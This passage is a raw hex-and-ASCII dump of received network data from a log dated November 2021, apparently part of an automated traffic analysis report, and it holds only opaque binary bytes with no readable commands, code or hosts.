a0 ee 98 ff 44 5a 8e da 8e 45 10 23 01 cc f9 ce 28 13 65 90 78 62 e8 d5 13 03 24 25 e6 20 d7 27 e1 8b e0 38 01 af a4 81 1b 45 3f 19 fc 41 20 a9 a6 2c fe 39 77 49 11 1a 44 d6
                              Data Ascii: @_z?P+Tia}a?Z/Y6`Ve(qY%h:H?nSQ>~JAH9u<wtXb]ZZ`2{O'2q>v/cD*r-:*l:"z>%z`zf?^DZE#(exb$% '8E?A ,9wID
                              2021-11-23 11:22:36 UTC196INData Raw: 68 0b c2 b0 a4 60 ab c9 38 ce 3f 8c bc b2 98 cb ec 4b 34 2b 0d c7 d9 e6 ae d5 61 84 31 75 06 3c 1a 8c 9f f4 a7 43 af 4a 91 c2 61 b4 c4 f2 d9 34 40 ad db eb 87 51 f5 c0 79 50 a4 86 83 c8 ec 48 88 12 98 de fe e1 2e 03 19 05 00 40 ab 9e 71 63 73 de d1 cb 29 f8 d1 4c 97 06 84 30 c5 3a 72 ab dc e0 f6 71 46 01 10 d4 36 ac 19 55 4b 07 fa eb f6 70 ba 44 ae 1a 37 16 5f 36 20 95 9c ff ca 1f ba 7d 68 b1 ec fd af 89 99 fd cd 21 68 65 ab e7 46 9d 1d 27 64 c5 9c e1 d8 4f 72 a3 65 20 97 2f 4a e3 34 35 bf 8e df c3 0a c4 53 7f 0f 4a 3b 71 9c c5 5b 33 ea ff 8a df 5b d8 9c 02 13 90 10 e1 ee 4b 3b 98 be e4 39 60 c0 0d 94 c0 0b 40 c3 e5 40 ea 47 af f6 62 e5 fd 9f 7f 6e 37 06 18 3d 5d 5a c6 e3 36 86 b7 4e 16 8d b2 cb 39 ba 7e 54 0c d7 81 aa 1a 7e 84 40 ad 2c 1f 0d 84 e0 97 65
                              Data Ascii: h`8?K4+a1u<CJa4@QyPH.@qcs)L0:rqF6UKpD7_6 }h!heF'dOre /J45SJ;q[3[K;9`@@Gbn7=]Z6N9~T~@,e
                              2021-11-23 11:22:36 UTC198INData Raw: 79 e3 58 60 5f 4b 24 44 ad 0a 70 dd f5 e3 5b a7 74 72 76 e6 36 97 5e ec 7b d3 d8 df a8 58 5d 22 90 66 46 ff 28 d2 b9 b1 5c 9f f9 a5 17 ff fd 77 fb 69 fa 4e 96 1a 6c 4c 17 0c 2c 22 15 f6 97 f2 98 3d 3a fb 18 84 84 33 d8 ff 15 9d f7 0b 7d 45 ad 87 f8 51 d7 b9 69 32 7d 01 f8 bf c7 fd a1 fe cc c9 23 6d 9f e4 a8 65 19 12 5e 9e 90 fb 29 0f 65 8d 2a 3b 8c f8 5e 0b 14 22 cb 19 91 47 b9 e2 e4 32 11 95 f1 83 3c 08 53 51 f7 5c 21 b9 ca 2e a5 4d 6a 7d 62 3c 56 b3 3d 7a de 92 91 ce f4 b7 2b bf fe 5d df 5e 53 b1 fd 1f bf 04 93 60 77 fe 79 74 46 23 00 aa 13 89 e4 a9 8b 65 10 1f 2c fd 98 01 bf 8a 6c 09 36 60 f0 cf 3b 92 b2 8a 5e f6 82 9e db 9d 2a d1 02 07 ed 6d 19 9e c8 d9 3e 52 2d 19 b2 83 f0 0b 67 09 ab c7 7a 92 82 9f 79 cb 79 08 cd 96 48 83 e0 ce a5 e2 34 59 56 56 d8
                              Data Ascii: yX`_K$Dp[trv6^{X]"fF(\wiNlL,"=:3}EQi2}#me^)e*;^"G2<SQ\!.Mj}b<V=z+]^S`wytF#e,l6`;^*m>R-gzyyH4YVV
                              2021-11-23 11:22:36 UTC199INData Raw: 87 36 99 6c 41 74 73 e4 ed 84 5d 99 2b 8e 22 5b 06 71 46 00 c2 de d0 f3 7b a9 45 3c 80 cb 98 ce b9 fc eb c5 40 7d 53 df e2 63 c9 01 00 01 a3 b8 84 cb 47 13 96 6c 26 a1 5d 53 f5 32 35 f9 a0 d6 d2 1b c5 74 1a 4d 41 54 51 af a0 6b 3f 93 ca b7 df 6e e5 e8 1a 08 ff 36 cd 8b 44 17 cc a5 cc 5c 03 de 64 9c fd 58 4d fa 97 6f ad 62 8e ed 5e cb c1 b1 31 5d 04 2e 15 06 69 4b e4 cf 22 8b 97 4d 06 c8 96 e8 2f b3 6f 58 1c ee f3 a4 23 10 b2 5a d8 03 32 78 b2 dc 97 47 98 44 22 eb cf 87 a6 4a b0 4d 15 94 eb 2e d0 8f 63 cf be 2b 6b ec 9c 11 74 19 80 98 eb 6f 78 1c 31 2f 5d 29 a3 ff b4 6f 88 40 1a 80 93 69 c6 fe 35 2d e5 8d e1 79 c9 13 cf 11 eb 06 6a 94 8f f4 61 3f 3d e5 4a 91 56 36 7e d0 40 54 63 fb c0 8c 96 81 1d 68 6c 66 a5 44 3b fb bb c3 c0 6b 4c 02 4e 2c 1a e5 08 c1 d7
                              Data Ascii: 6lAts]+"[qF{E<@}ScGl&]S25tMATQk?n6D\dXMob^1].iK"M/oX#Z2xGD"JM.c+ktox1/])o@i5-yja?=JV6~@TchlfD;kLN,
                              2021-11-23 11:22:36 UTC200INData Raw: 0c 3b 30 30 bc 9e 9a 00 3d 0b ac 2e 54 89 fa 5e 20 00 76 cd 06 e5 76 b0 8b e0 38 01 af bb a5 38 1a 3f 43 d6 2e 23 bb ca 1a b9 4a 41 6d 7c 77 51 be 3f 7e cd 97 8c c5 d5 d8 34 be ef 70 db 4d 52 b0 94 02 bd 70 82 70 73 d7 4b 65 53 00 1b a5 03 85 cc a1 e7 54 21 2b 40 ca 93 07 d0 88 60 67 17 12 d8 c7 06 ba bd 8e 54 92 b8 95 d2 f9 34 cd 02 00 e9 67 52 da f7 d9 20 57 0e 1b ef b9 fc 0d 65 60 84 c4 1e 86 91 9e 73 ec 18 38 da c5 18 b5 fa c8 a5 ed 3f 1a 63 5a f2 3d d5 43 5e 52 92 74 41 76 44 64 46 6e d8 bf a5 be 4f b3 7a 23 ed 30 7c 89 62 c1 fe 26 1c fb 0f 39 6d 57 cc 68 d8 69 c0 d5 63 f3 10 57 18 63 16 22 bf c5 10 8c e2 25 5a 16 96 e1 a3 53 1d f0 3e f6 7f 9e f9 ba c2 92 0c 04 b4 78 5b 64 67 43 65 6d 40 0a 0c 18 3e 8c b9 b2 b4 0b bb 55 69 42 0e 5e 6c 37 af df 10 26
                              Data Ascii: ;00=.T^ vv88?C.#JAm|wQ?~4pMRppsKeST!+@`gT4gR We`s8?cZ=C^RtAvDdFnOz#0|b&9mWhicWc"%ZS>x[dgCem@>UiB^l7&
                              2021-11-23 11:22:36 UTC202INData Raw: c4 ac 79 ef 4e 85 f9 66 de de b8 31 7e 15 28 1e 3a 5f 5c e3 c8 28 8b 9b 6f 11 a7 85 e2 38 83 4a 36 19 ea f5 92 07 10 a7 7b c1 0a 15 7e ac b9 d5 4d fd 73 10 a8 fe 98 d4 6a b3 39 10 8c 87 1d c8 fd 4e a2 fd 0c 72 f4 8c 30 65 6b a4 89 f6 03 76 1a 24 04 76 27 be d8 86 68 9f 25 35 8c fe 4b ec e8 0d 2d f5 89 cd 78 d6 1a f9 06 ed 0a 64 97 cd d1 77 3c 51 cc 4a 80 75 15 69 d7 73 5c 10 ec ca 96 ba a1 73 4b 46 74 a4 55 3a ee b5 c0 b3 4d 3e 38 52 37 06 d3 7c f7 db 41 3f b4 f5 27 2f 42 f5 02 91 85 85 aa a6 71 a5 e7 50 1c 32 13 b7 c7 96 03 5b d4 d3 85 d3 b3 a0 77 bc 2e 11 36 eb 7c 5d f9 53 b8 4d 6d d7 1c ab eb 34 9a 3c 48 32 89 41 05 49 5f 27 e6 3f c8 fd b8 c3 35 18 d1 18 9f 16 1c dd 4a 6e 84 f5 3e 2f 8e 57 3d 8a 88 95 53 15 27 e5 59 e2 0c 4a 43 e1 4a a3 16 97 55 b6 f0
                              Data Ascii: yNf1~(:_\(o8J6{~Msj9Nr0ekv$v'h%5K-xdw<QJuis\sKFtU:M>8R7|A?'/BqP2[w.6|]SMm4<H2AI_'?5Jn>/W=S'YJCJU
                              2021-11-23 11:22:36 UTC203INData Raw: 3b b7 a3 9c c0 94 02 da 05 3b f9 7e 33 f8 d7 d9 39 59 05 39 b9 93 f4 1c 76 60 85 cd 1e 81 91 96 6b c3 1c 25 cb bd 59 8a e2 ff b4 e0 3d 6a 43 5c df 32 a6 6f 06 10 a0 6c 5a 7b 65 73 23 59 ca a8 ad a1 44 b2 63 34 e9 13 7c 92 64 c1 99 75 26 f6 01 2f 7a 73 c4 6e f9 78 c0 dd 5f e9 62 7f 04 63 63 0b b5 dc 0a a5 f5 27 5b 35 96 fa a5 53 7a 97 1c e7 54 8a ee a0 d7 81 11 11 90 63 5b 6c 0e 5c 65 4a 6b 3c 00 05 3a fe 93 ad ad 12 b5 49 0c 76 1f 58 5a 0a bc be 30 3c 67 74 0d 89 b5 d7 3f b1 7f 36 ad ba f0 33 b7 ee 4c cd 06 a2 89 93 f6 fd d0 26 12 50 4e ec e2 95 9f f2 00 ab 0a 10 25 2c 62 a1 a9 81 b2 7f c0 46 c4 87 6c 97 ad e4 e3 5a 25 ab af ff bb 3f f5 d6 16 7f 82 e7 b2 f7 9f 63 b0 12 8f fd 90 a7 1f 66 2a 0c 43 7c 8f f2 5d 63 7e c5 f7 ea 47 8b d3 5d bc 10 81 58 cd 0a 06
                              Data Ascii: ;;~39Y9v`k%Y=jC\2olZ{es#YDc4|du&/zsnx_bcc'[5SzTc[l\eJk<:IvXZ0<gt?63L&PN%,bFlZ%?cf*C|]c~G]X
                              2021-11-23 11:22:36 UTC204INData Raw: c4 0d cf 3d fd 05 60 99 b9 d2 60 3f 5c d9 5b 97 26 35 74 f5 77 5f 75 f9 c6 81 b5 85 6f 4e 64 77 83 44 3a 8b 91 c3 d0 61 28 24 50 13 08 f2 69 e8 db 54 37 c6 b2 07 35 64 f5 01 e4 a2 9f aa b6 6a b9 f4 54 03 46 3b a0 aa bb 18 4c e6 d5 8e f0 bd bf 1a ba 3f 11 0c d5 2c 5b ee 46 8a 0e 65 df 18 81 c8 01 89 4e 7a 3a fb 50 05 4f 43 18 ea 3d dc e4 dd d3 58 7f d7 01 c0 36 1f ae 7f 6e 83 c5 1b 2d 8e 48 3d 8a 88 95 53 18 3d f3 66 87 29 44 5a fb 5b 96 73 b0 79 b6 d6 cf 06 3d 24 61 7e ff a1 40 ee 58 17 49 5c 50 4f 8f 29 7b cf 90 d7 32 ad 63 3f 7e f0 53 d4 66 ff 1f f3 d8 c3 cf 53 5e 29 9a 14 05 ce 23 c7 ac aa 6a bb f9 af 1c f7 d3 6c da 7e 88 62 8b 77 5f 52 17 1e 2d 1b 08 f7 b0 f8 9f 2c 7f ca 03 9b 9e 56 f9 d7 0e a9 e0 64 4f 4d a2 bd d2 47 c0 d6 7c 57 5a 31 ce ba cb ea 8b
                              Data Ascii: =``?\[&5tw_uoNdwD:a($PiT75djTF;L?,[FeNz:POC=X6n-H=S=f)DZ[sy=$a~@XI\PO){2c?~SfS^)#jl~bw_R-,VdOMG|WZ1
                              2021-11-23 11:22:36 UTC205INData Raw: 6a 78 2a 90 fe b9 3d 3e 9e 0a 93 48 a1 e5 a7 d5 9a 16 12 e4 49 5b 6c 78 4a 72 4d 5d 17 0b 05 59 df 83 ae ad 1e b7 09 58 74 02 58 2b 0b ad b8 31 25 75 42 2d 82 a6 d7 33 b2 78 36 ad ba 83 60 a9 f8 4c f7 22 e2 b8 8a ed ed dc 02 19 39 61 ec ee 87 87 cf 11 a7 16 14 35 00 75 aa b9 f4 b5 73 db 77 8d ac 61 8d b1 f2 e9 7d 4b bf b7 e2 b0 30 fe da 09 77 80 e7 b4 f7 83 62 ad 12 8e f1 8d d3 1d 6e 70 10 6f 64 91 fb 75 72 6e ee f6 ee 29 f8 d1 4c 97 02 b3 48 cd 01 07 a4 cb 95 e1 48 2b 04 32 bd 30 a8 7c 57 74 75 f8 de 82 5b 82 2a 9e 4d 64 26 7a 5f 0b a5 cf c9 f1 76 89 65 18 8d d2 92 a0 ad 99 cd ff 46 6e 4a e4 f3 65 f4 17 1e 17 a3 ac 84 cb 47 35 92 62 27 b0 5c 07 eb 27 24 a6 a4 db c7 3d cf 04 38 28 66 78 5a a5 b7 6c 6b ad df a6 96 70 e1 fb 20 0e fe 3b d6 8a 4f 11 eb dc ef
                              Data Ascii: jx*=>HI[lxJrM]YXtX+1%uB-3x6`L"9a5uswa}K0wbnpodurn)LHH+20|Wtu[*Md&z_veFnJeG5b'\'$=8(fxZlkp ;O
                              2021-11-23 11:22:36 UTC207INData Raw: c6 56 05 53 56 16 f2 21 dd 90 df c4 2c 47 f6 10 f9 13 04 b1 59 0b b9 eb 04 22 85 59 6f 9c 9e 94 60 28 53 cd 47 85 18 44 4e df 5b 97 06 8f 68 c2 e6 c6 1b 12 13 7d 7a ff 84 71 e2 53 14 2c 79 35 79 a3 09 7d dd 9b d1 32 98 7c 4b 69 c1 3f fe 6b e3 6b b7 e2 c8 bc 61 57 2b db 2b 64 e3 30 c5 a8 b3 6a 85 ff c0 2e ff dc 5d f3 69 97 68 97 03 1c 7f 06 0b 3e 28 12 f5 bf f3 88 58 7f d6 07 9d 9e 39 c4 df 1f 97 e6 0b 7d 45 ad 8d f8 56 c7 d4 6b 39 7d 5e ca b4 da c1 9e fb db ac 2a 7c eb fc 8f 78 2e 36 42 9f 97 ee 47 3d 6e 90 16 17 9d ef 2c 27 09 02 ae 28 b5 57 b9 ef d7 32 1c 9e 85 d5 3a 18 4b 7a fd 41 27 bd a6 0c ae 5d 65 67 78 37 71 d6 2a 7e d8 ac a6 c4 c7 b6 33 db fc 4a ff 73 62 bd 9e 07 99 1f b9 7b 70 9b 6d 74 42 01 1a aa 15 af cd b3 89 75 75 28 16 eb bc 07 dc 89 79 7d
                              Data Ascii: VSV!,GY"Yo`(SGDN[h}zqS,y5y}2|Ki?kkaW++d0j.]ih>(X9}EVk9}^*|x.6BG=n,'(W2:KzA']egx7q*~3Jsb{pmtBuu(y}
                              2021-11-23 11:22:36 UTC208INData Raw: e9 47 51 8a b4 f4 99 34 eb 95 2b 77 95 ef b3 ea 9e 75 95 77 a4 88 98 de 78 64 27 53 53 71 8e ea 73 6b 29 d2 fd fe 5c f9 dd 4c b1 61 91 42 dd 1c 06 a6 ed 92 f4 57 2e 1c 46 b3 36 8e 46 72 6e 74 f8 d0 94 5e 94 44 aa 28 43 17 70 53 06 b7 e8 d0 f3 78 bc 59 1b 9c d6 9f a2 a7 99 f8 ff 55 54 73 cf e7 63 f8 0b 03 22 c2 a6 88 d3 61 72 ad 78 3e b4 46 77 e0 3b 50 b8 89 ca a6 0d d0 6b 1c 26 51 54 42 bd c5 4c 12 99 ce b7 b2 33 d2 e9 2b 3f f9 35 dc c0 79 06 ea b5 dd 55 6a e2 6c 84 f1 64 4b b5 a3 65 df 4c 80 f4 5a cf c1 a7 1f 4f 19 32 20 1b 43 3f f1 df 35 a0 b6 50 17 a9 9d dd 33 95 55 5f 09 ee ed 80 27 13 a9 6b d4 6f 05 7f a5 d8 e3 45 b9 59 0f cd d9 81 bb 5d a7 39 31 84 f3 05 f7 98 61 a6 8e 3e 69 e1 e9 04 74 6d 9e ab fa 73 70 1c 39 2f 4d 46 9c c8 b4 70 84 34 2d e1 91 7c
                              Data Ascii: GQ4+wuwxd'SSqsk)\LaBW.F6Frnt^D(CpSxYUTsc"arx>Fw;Pk&QTBL3+?5yUjldKeLZO2 C?5P3U_'koEY]91a>itmsp9/MFp4-|
                              2021-11-23 11:22:36 UTC209INData Raw: b0 19 91 02 ff 0d fb 79 12 30 71 7f 5f 45 7c 98 d9 93 f2 56 34 bd 51 f6 ed 4a b2 b4 5a f8 93 19 a5 ad c5 e9 96 34 bf bf 0e 54 01 50 a3 d3 aa 9e cf 98 a7 cf 44 09 f9 3b 7b 02 7b 57 30 e7 eb ff 42 7a 0b f6 c9 c9 ed 9d 5f 43 75 1f aa 61 e4 13 d9 8d 87 5e 74 fe ff d7 5a 7d 3d 24 bf 3f c4 79 c9 4f d2 54 33 28 13 4b 68 d8 4f 1e 8c f1 e4 a5 ae dc 47 da 93 21 8d 2b 35 c8 f0 7d fe 74 cc 14 0a 92 2f 11 36 50 f2 0a 62 cc a2 d4 67 c4 71 6d 79 82 f3 67 bf ec 15 19 77 14 91 b0 f2 32 c1 6d ea e4 51 2e a7 79 be ba 77 74 8d 18 fc 43 8b bd 57 3e 72 fc 24 f6 b1 6d 03 1b 6a 46 1a e0 e2 f0 16 ab 59 4b ad 73 fd e3 ae ba de 03 8d 1c 17 34 b1 4e 26 f3 7b 61 c9 12 b3 d2 38 83 97 39 2b 09 d9 cb 38 77 ea 5f 90 6b 0b db 0b a5 93 06 4a 94 64 5b 8e c3 ad 8d 65 0c b4 b5 38 9b 65 1e 75
                              Data Ascii: y0q_E|V4QJZ4TPD;{{W0Bz_Cua^tZ}=$?yOT3(KhOG!+5}t/6Pbgqmygw2mQ.ywtCW>r$mjFYKs4N&{a89+8w_kJd[e8eu
                              2021-11-23 11:22:36 UTC210INData Raw: 1d 79 8f 48 89 90 aa 20 59 1d b2 77 83 6e 6d d9 2d 0a fe b6 73 5c ea 28 54 fa ea e0 02 58 73 81 36 ec 48 2c 3f 91 2c 65 f2 ff 0e ab 89 be 73 50 5a 13 1d 90 d9 06 87 3a 7c 30 3c 65 15 fd 79 09 b6 e8 b7 07 d6 13 3b 19 83 59 8b 1f 8d 17 ab ad a3 fa 1b 2f 5a e8 68 18 9f 64 bf cf dc 1f eb 83 c1 6a 80 85 16 82 10 e7 03 e4 65 29 3c 70 75 58 48 68 19 5b 8f 7c 8d 28 d1 77 f4 ee 57 b7 b7 74 e0 95 07 39 34 d4 db 16 b8 b3 a7 0e 4b 15 42 b0 cd b3 82 d3 86 b4 cb 5a 08 e3 bc ff 1e ff da 31 e4 f9 9f 67 5b 18 e4 41 52 c8 9f 5f 4a 74 76 a8 61 e6 10 cb 97 85 55 75 f3 ed c9 40 61 22 2b b7 2e 47 c0 d6 55 c2 3d 35 09 13 45 02 c3 5f 9a 39 f2 fb ab b4 c8 46 da 85 2f 97 3d 26 d5 fc 79 c8 f1 41 14 1a 9b 3f 03 b7 cf 73 d5 67 6c 02 c1 a4 0f 60 7f f9 16 fc 71 ad 6d 4d 0a 7e 1c 9d ac
                              Data Ascii: yH Ywnm-s\(TXs6H,?,esPZ:|0<ey;Y/Zhdje)<puXHh[|(wWt94KBZ1g[AR_JtvaUu@a"+.GU=5E_9F/=&yA?sgl`qmM~
                              2021-11-23 11:22:36 UTC211INData Raw: fb 8c d3 40 10 a4 7c 32 f2 94 42 ab e4 2c dd 0f d8 95 fb af 70 0f 5e 57 1d 0d e0 9b 0b 03 0f 90 1a ac 2d 88 d2 38 c8 4b d1 30 a4 6c 7b ce 8f fd 90 3a 43 6d 4e dc 56 fa 1b 36 13 0f 98 bd f7 2f e8 4a ea 4a 34 43 88 aa 67 ca 81 be 93 02 f8 37 6d e4 be e0 cb d0 85 83 87 24 19 b0 be 91 93 8c 65 73 79 bf d6 fd a2 1a 70 e6 0e 57 e0 2e 09 91 41 52 e4 e2 b5 a6 4d a0 18 6d 78 14 3b 30 d9 c0 11 65 ed bd d1 c2 18 9d 99 4d 43 90 5a a4 eb 37 66 85 d9 e4 3e 29 8d 1f 72 91 09 2b 95 f0 18 2f 28 e3 8e 20 a2 bb c9 34 10 75 52 5c 6c 32 37 8b bf 5d e3 f0 bd 42 c0 ec 88 46 e9 3b 33 62 87 9c c8 50 fc d3 04 a8 61 5b 08 d2 3b 9a 32 7f 3d 60 ad a7 f0 c9 2a c3 3c 58 ef 9a 5f b7 7f 1b d2 f8 57 1e 85 ec 71 93 0c dc ed 95 11 78 78 70 59 35 55 cd ae d4 11 ed 42 41 f3 7c 05 8b 92 51 55
                              Data Ascii: @|2B,p^W-8K0l{:CmNV6/JJ4Cg7m$esypW.ARMmx;0eMCZ7f>)r+/( 4uR\l27]BF;3bPa[;2=`*<X_WqxxpY5UBA|QU
                              2021-11-23 11:22:36 UTC212INData Raw: e0 0a f3 62 0e bc 7b 7d 51 45 74 96 d4 80 f2 56 34 ad 60 76 5d 54 a4 bc 72 e4 9c 00 05 28 d4 db 15 98 b0 aa 0e 44 08 59 b8 c3 2c 33 cc 94 a7 c2 64 08 fe aa 68 bd 7c 44 30 e9 f8 9d 52 4b 89 55 4b 5a e6 95 59 40 75 f7 9b 73 65 f6 cd 8c 8d 53 60 e2 73 dc 5f 73 31 2b bf 33 4a d2 c4 5c d1 bb 84 0a 1f 57 0d cb 43 12 ab f6 eb a5 bc ca 2e c6 95 29 8b 2f 37 da f3 62 c8 77 c9 00 16 1a b3 10 38 5f 7c d9 e5 59 b0 af f5 80 d4 6b 58 8e ef e6 06 e2 0c 29 70 00 1d 1f 74 df d2 ff b9 37 d9 fe b5 f8 7a ba 7f 7b 8b 0c 69 8c 04 21 56 30 7d 72 cf f8 8c 62 0a 24 ed b3 0b d2 62 68 1f bc f8 0b aa e1 ad 7f 8f b4 d9 91 d9 83 36 27 31 1c a8 28 66 74 41 a0 3d 0d 43 0b 5b 2e b9 5d 84 dc 43 ff 06 59 84 69 08 f8 1a 2d 50 3a 58 17 a7 56 0b 16 bc 1f 1c 99 b9 b4 33 92 70 bf ef 05 04 e7 90
                              Data Ascii: b{}QEtV4`v]Tr(DY,3dh|D0RKUKZY@useS`s_s1+3J\WC.)/7bw8_|YkX)pt7z{i!V0}rb$bh6'1(ftA=C[.]CYi-P:XV3p
                              2021-11-23 11:22:36 UTC214INData Raw: 0b 72 f3 0c 5b d5 3e 84 89 40 5e eb 66 f3 a2 6f bc 17 7e 59 15 31 3c d9 c0 03 79 68 9b ce cd 74 9d 99 58 57 8d 44 a4 ec 23 43 9a ce 3e 0c 1e 9d 10 f5 94 0c 23 86 e0 16 b0 3d fc 9c 33 a8 bb da 31 0b 71 40 53 5c 34 22 8a a7 4f e2 f0 0a 65 e8 f3 8c 55 f1 23 3f 6a 8b 9c c8 4c 63 c3 11 a5 5b 41 15 d5 ab 16 b9 fc 22 fc e8 af e7 55 b6 df 2b d7 a1 89 46 ab f3 0e d2 f8 44 09 19 e9 7f 19 04 cf f4 87 1f 03 fe 10 49 5d 4e d0 be c8 00 f0 5c 49 fd e3 0e 8e 9c 5d 5a 04 40 ac 18 8d 78 bb 67 8d ee 9c fb df 14 52 4f 2f 2c a7 e4 34 e0 5b ba 0e 3f 0c 85 a1 f0 67 e1 13 3d 88 52 ff 29 5a e2 c6 2c 12 06 44 4a 22 45 67 8e 06 8b b6 28 43 36 ff 4a 5b 13 98 7d ea f1 74 93 f3 05 d4 8c 3f 79 3a 5a d2 ab fa 79 26 87 a6 f9 b5 da cd 73 da 5b 6b 61 af 22 34 8c 34 dd 43 04 ba 60 fc ab 63
                              Data Ascii: r[>@^fo~Y1<yhtXWD#C>#=31q@S\4"OeU#?jLc[A"U+FDI]N\I]Z@xgRO/,4[?g=R)Z,DJ"Eg(C6J[}t?y:Zy&s[ka"44C`c
                              2021-11-23 11:22:36 UTC215INData Raw: e2 bd 70 d0 b4 b5 cc 49 d5 86 27 96 24 2b dc e0 64 c7 78 c4 1d 0c 86 22 19 2b 4a 7a c3 75 85 aa ce ef 1c 7d 68 78 8d ff 6a b1 c5 0e 1b 65 00 1e 3b 73 ed 52 ad 35 f8 c4 e9 34 60 66 a6 f0 34 82 04 72 83 8b b0 4a 3b 68 61 c4 ed 94 64 10 88 aa b1 77 c8 eb fb 19 a6 77 45 b1 fd 24 e8 86 b2 d7 84 54 06 25 b7 85 52 bb 23 75 63 dc 05 21 9d af 1e 43 36 ae ce 46 d3 37 f2 09 3e 8b 63 0a e7 16 aa 84 23 58 92 62 44 06 2b bf 1f 1e 89 ba a9 35 95 e1 07 64 6d 13 46 d0 a0 fd d9 87 64 3b 4d ff 96 c2 35 67 f3 71 96 2b cf 8a ce b7 f7 7f 63 f8 02 30 02 0f 33 0e 11 33 72 70 64 d8 15 fb cf 58 3b c8 43 02 04 68 ad 9c 58 da 5e 04 47 1a 22 e9 ba d8 b0 47 43 ba 5d cc c1 e2 e2 c7 9f 36 a6 7e 9d 59 57 9a 87 b7 42 70 7b 03 91 0d 7b e3 88 69 c4 44 74 53 e8 87 c7 c0 f3 c0 1e b2 2d d9 c7
                              Data Ascii: pI'$+dx"+Jzu}hxje;sR54`f4rJ;hadwwE$T%R#uc!C6F7>c#XbD+5dmFd;M5gq+c033rpdX;ChX^G"GC]6~YWBp{{iDtS-
                              2021-11-23 11:22:36 UTC216INData Raw: 3a 79 ae ab 75 4c 2b db 39 56 e1 83 5c a5 fd 06 cb fa 4a 1b 98 ed 8c 12 19 c1 ec 9d 12 91 e3 54 1b 34 46 cd b9 d5 1e ed 40 50 e1 fa 0c 89 98 5f 58 86 f9 a6 19 a5 7f aa 76 6f 6f 05 fa c9 95 1d 5a 3d a9 3e 15 26 61 19 b4 15 33 16 80 aa e4 f8 f5 9d 83 0c 14 ea 30 c8 23 d2 aa b7 06 44 49 2a 47 49 81 00 8d b3 27 58 b6 b8 4a 53 0c 8d 76 ec e8 fe d6 f0 25 d5 88 39 79 36 7e d3 a8 f3 76 25 82 ac fc be da c5 72 fb 49 6e 61 af 39 3b 9b 39 d2 45 17 b8 60 fe a0 6e e7 46 2e 4e 0a a7 68 35 08 7f 83 6d a8 91 b3 aa 58 1a a3 f6 1e 63 f2 5c 3c 88 71 ac 77 5a e3 2b be 78 e4 e1 0e 54 42 03 b5 f3 d9 aa 32 8d 3f ef 6f e7 1a d3 16 22 69 4d 47 05 0e 0e 44 10 87 3c 67 3d ad d1 10 e0 67 06 3a f0 b7 b0 ce 03 bd 1c 86 4e 86 8e 21 06 b0 a5 b3 c4 09 3a 4e e8 77 85 29 59 be c7 c2 05 e1
                              Data Ascii: :yuL+9V\JT4F@P_XvooZ=>&a30#DI*GI'XJSv%9y6~v%rIna9;9E`nF.Nh5mXc\<qwZ+xTB2?o"iMGD<g=g:N!:Nw)Y
                              2021-11-23 11:22:36 UTC218INData Raw: a8 24 67 61 c4 11 b3 e6 38 83 a2 39 2b 09 d6 4e ce ff 12 57 8e 71 88 1f 05 be 19 df 41 92 68 58 8e d2 ae 8d 78 04 b4 b7 22 07 86 2c f6 d1 07 e6 29 b0 76 e7 8f 56 be a9 f0 13 3b 36 5a f4 6b 13 e7 df 0b 3b ba fd 76 67 e3 08 26 82 e2 27 10 1e 31 6a e5 9a 48 0c 12 d3 cb fb 0f 36 8d 28 74 24 02 5b da 5f a8 5b 94 dc 7a fd da b8 58 cf 03 51 df da fe 6e cd 95 25 a6 63 91 d5 ef b8 8d b8 5a f7 96 03 8d 82 ee ec 86 68 cb 6c 7f 49 61 32 c3 d8 fc d3 04 2e b1 c5 d0 82 0d d1 84 0d ad 24 ea 5b 61 d5 5b 9b 87 f8 67 f0 81 c7 94 e5 05 d9 1b cc 09 c7 ae 6a 83 b2 55 00 0a fa 83 13 0e 0d a1 98 88 3b 0a 2d 39 da cf 3e 3c a3 6b 70 c7 88 fc 88 3b 5b 79 5b d6 54 fa 1b 32 13 16 1c 84 f1 12 ef 46 ff cd db 5c 01 16 67 c0 8e 39 71 0d 7d ff 64 fe bd e0 cb d4 9b 8d 1a f4 16 37 a3 84 31
                              Data Ascii: $ga89+NWqAhXx",)vV;6Zk;vg&'1jH6(t$[_[zXQn%cZhlIa2.$[a[gjU;-9><kp;[y[T2F\g9q}d71
                              2021-11-23 11:22:36 UTC219INData Raw: 40 35 2b 43 49 91 98 78 c4 e1 f7 cb e7 84 4e 83 23 f0 3a 7d d5 a5 eb f0 bf 89 b5 76 2b d7 c8 72 c9 ca 6d 78 26 28 34 96 37 dd 50 0f ba 75 f1 a9 75 7a eb 28 4d 08 2e 67 1d 02 65 06 d0 a7 8c bf 81 5a 0a 33 e8 97 7a 79 c8 3c 8a 55 ab 65 da e3 3f 15 f9 fc 60 08 56 7b 80 21 f0 db b2 37 9f bf ec 77 e5 0e 40 a8 a8 4f 49 47 1c 9d b0 d8 13 9a 38 68 26 29 56 13 fd 60 09 bd fd ad 3a c8 1b 3e 11 88 43 96 0c 93 1f a7 af b1 d1 15 34 66 f7 7b 00 85 5f ae be de 67 eb ea c0 43 92 81 18 ad 0c ec 0a f7 6a 19 23 77 63 43 43 72 85 c6 80 e0 45 38 b0 79 e8 f1 4a a2 b6 7a f8 97 17 20 08 c0 d4 92 37 a2 be 06 4b 14 5b b0 cd b3 82 d3 86 b4 d5 59 0d e3 bf ec 1e fa 56 35 fa f9 88 c3 5b 0d e3 4b 49 ed 8f 37 48 47 75 b3 64 f8 17 ca 8e 9a 58 7f f7 f7 c8 58 60 3a 2b b9 26 4c d6 ca 4a c5
                              Data Ascii: @5+CIxN#:}v+rmx&(47Puuz(M.geZ3zy<Ue?`V{!7w@OIG8h&)V`:>C4f{_gCj#wcCCrE8yJz 7K[YV5[KI7HGudXX`:+&LJ
                              2021-11-23 11:22:36 UTC220INData Raw: 30 68 fa d6 a5 56 c1 0b 5f c2 d4 f0 60 ce 9d 38 a8 6b 8c db e6 98 89 b9 4b 77 7e 0d 83 8c e6 eb 80 61 c2 64 75 41 69 1a c4 ca f4 c6 16 af 28 c4 c2 02 e1 c4 96 8c 34 25 f8 db 8d d2 51 92 95 79 12 f2 86 c0 9e ec 0c de 12 dd 88 fe a7 78 03 5e 53 00 08 fd 9e 16 06 07 81 98 9d 29 8b b4 38 c8 4f d2 30 a4 6c 72 c9 8a e0 95 27 46 65 46 d4 53 fa 19 33 1d 07 9d bd f6 32 ed 44 ed 4d 37 52 08 36 65 c2 9c b9 9d 1f fd 2a 68 f9 bb fd ce dc 99 8f 9a 21 0b 12 ab 83 91 85 78 70 64 9b cb e1 3f 18 72 e0 0d 52 c0 2f 07 8c 42 50 f9 e7 b3 a7 4f bd 04 7f 4d 42 3b 32 44 c5 1f 